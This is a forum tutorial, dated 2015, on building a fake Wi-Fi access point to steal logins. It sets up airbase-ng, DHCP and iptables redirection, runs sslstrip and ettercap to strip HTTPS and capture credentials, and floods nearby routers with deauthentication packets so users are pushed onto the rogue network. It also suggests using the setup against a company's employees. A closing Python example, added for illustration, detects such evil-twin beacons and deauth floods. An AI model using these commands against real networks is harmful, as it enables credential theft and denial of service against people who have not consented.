
Manually Creating a Fake AP to Capture Logins

on: August 19, 2015, 04:55:23 pm


Note: Yes, I do realize some sites are utilizing TLS, so we'll not be able to capture the logins of those sites unfortunately as the encryption mechanism will not be decrypted. (if you know a way to strip the encryption, please tell me!)
> Explanation of Attack:
We'll be setting up a fake access point where we'll be stripping the encryption of sites using HTTPS to HTTP so we can grab the inputs of the username and password fields. We'll also be sending deauthentication packets to all other routers nearby, rendering them useless and forcing the user to log into our malicious access point. This can easily be used for attacks known as "waterhole attacks", where you attack a company whose employees don't even notice they are on a malicious AP because their devices automatically connected to the malicious one due to the other ones being shut down.
> Requirements and Lab:
Kali Linux
A network adapter that supports packet injection, monitor mode and master mode.
Exposure to the Linux environment and a decent amount of wireless penetration experience.
A functional brain that can process information.
> Get our default gateway:
You may do this by typing:
Code: [Select]
route -n
Under where it says "Gateway", you'll need to memorize it or write it down as we'll need to use it when we set our IP tables up later on.
> Now let's install DHCP3-server
Firstly, if you haven't done so already, type:
Code: [Select]
apt-get dist-upgrade
When that is done, now let's install DHCP server by typing:
Code: [Select]
apt-get install dhcp3-server
Now when it's done installing, we need to configure the DHCP server by typing:
Code: [Select]
nano /etc/dhcpd.conf
Now, copy and paste the following in:
Code: [Select]
# Hand out leases on 192.168.1.0/24, the network served from at0
authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.0 netmask 255.255.255.0 {
    option routers 192.168.1.1;
    option subnet-mask 255.255.255.0;
    option domain-name "freewifi";
    option domain-name-servers 192.168.1.1;
    range 192.168.1.2 192.168.1.40;
}
The only thing you'll need to understand here is the option domain-name line, where it says "freewifi", you may change that to whatever you want to call your fake (and malicious) access point. For this tutorial, I'll just keep it as freewifi.
Now, just save that by typing CTRL + X and then Y then enter.
> Now let's begin monitor mode
To begin monitor mode, type:
Code: [Select]
airmon-ng start <wireless interface>
Then to attempt to prevent any issues, type:
Code: [Select]
airmon-ng check kill
> Begin the fake access point
Now that you have monitor mode all set up, now let's begin the fake access point:
Code: [Select]
airbase-ng -c 11 -e <fake AP name> <monitor mode>
Now you have begun the fake AP, however, if you attempt to access it, you won't be able to. Remember to not close that terminal as you need it to be online.
> Now let's set up the IP table rules
There are a lot of commands here, so I suggest setting up a shell script, and this is how you do it, first type:
Code: [Select]
nano iptables.sh
Now assuming you have basic knowledge of networking, I assume you'll read over this and manually configure some of it as some of it might not work for you.
Code: [Select]
#!/bin/sh
clear
# Address the at0 interface created by airbase-ng
ifconfig at0 192.168.1.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
# Enable routing between at0 and the uplink
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to <GATEWAY IP HERE>
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
# Send client HTTP traffic to the local listener on port 10000
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
Then give it permissions by typing:


Code: [Select]
chmod +x iptables.sh
Then just run it by typing:
Code: [Select]
./iptables.sh
> Starting the DHCP server
To do this, simply type in:
Code: [Select]
dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
Then to start it, type:


Code: [Select]
/etc/init.d/isc-dhcp-server start
> Starting SSLSTRIP and Ettercap
I assume you know what both of these tools are doing, so let's start off by starting SSLSTRIP:
Code: [Select]
sslstrip -f -p -k 10000
Leave that terminal open. Then to begin ettercap, type:


Code: [Select]
ettercap -p -u -T -q -i at0
> Sending Deauth packets to all other routers


Firstly, begin scanning for the routers by typing:
Code: [Select]
airodump-ng <monitor mode>
Then, select your target and write down their channel number(s) and BSSID(s). Then set the channels by typing:
Code: [Select]
iwconfig <monitor mode> channel <Ch. Number>
Now, to begin the deauthentication attack, type the following command:
Code: [Select]
aireplay-ng -0 5000 -a <BSSID> <monitor mode> --ignore-negative-one

Now just sit back and wait for the users to log in and gather their data.
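
Seen from the monitoring side, the setup above leaves two signals: a known network name beaconed from an access point that is not in the inventory (here also as an open network), and a burst of deauthentication frames aimed at the real access points. The following is an added example, not part of the original post; the frame records, SSIDs, BSSIDs, inventory and thresholds are constructed for illustration.

```python
from collections import Counter

# Constructed sample (not from the post): frames a monitor-mode sensor saw,
# reduced to (time_ms, frame_type, bssid, ssid, encrypted). For deauth
# frames, bssid is the access point named in the frame.
FRAMES = [
    (0, "beacon", "aa:bb:cc:00:00:01", "CorpWiFi", True),
    (100, "beacon", "aa:bb:cc:00:00:02", "CorpWiFi", True),
    (200, "beacon", "de:ad:be:ef:00:99", "CorpWiFi", False),   # same SSID, open
    (300, "beacon", "de:ad:be:ef:00:77", "CoffeeShop", False),  # unmanaged SSID
]
FRAMES += [(1000 + 10 * i, "deauth", "aa:bb:cc:00:00:01", None, None) for i in range(200)]
FRAMES += [(5000, "deauth", "aa:bb:cc:00:00:02", None, None)]   # one normal deauth

# Hypothetical inventory of the organisation's own access points.
KNOWN_APS = {"CorpWiFi": {"aa:bb:cc:00:00:01", "aa:bb:cc:00:00:02"}}

def rogue_beacons(frames, known_aps):
    """Beacons that reuse a managed SSID from a BSSID outside the inventory."""
    found = set()
    for _, ftype, bssid, ssid, encrypted in frames:
        if ftype == "beacon" and ssid in known_aps and bssid not in known_aps[ssid]:
            reason = "unknown BSSID" if encrypted else "unknown BSSID, open network"
            found.add((ssid, bssid, reason))
    return sorted(found)

def deauth_floods(frames, window_ms=1000, threshold=50):
    """Map BSSID -> peak deauth count for any window exceeding the threshold."""
    buckets = Counter()
    for ts, ftype, bssid, _, _ in frames:
        if ftype == "deauth":
            buckets[(bssid, ts // window_ms)] += 1
    peaks = {}
    for (bssid, _), count in buckets.items():
        if count > threshold:
            peaks[bssid] = max(peaks.get(bssid, 0), count)
    return peaks

def evil_twin_alerts(frames, known_aps):
    """Rogue beacons whose SSID also has a legitimate AP under deauth flood."""
    flooded = set(deauth_floods(frames))
    return [r for r in rogue_beacons(frames, known_aps) if known_aps[r[0]] & flooded]

if __name__ == "__main__":
    for ssid, bssid, reason in evil_twin_alerts(FRAMES, KNOWN_APS):
        print(f"ALERT {ssid}: {bssid} ({reason}) while real APs are deauthenticated")
```

Either signal alone is noisy (guest hotspots reuse names, clients deauthenticate normally), which is why the alert requires both for the same SSID.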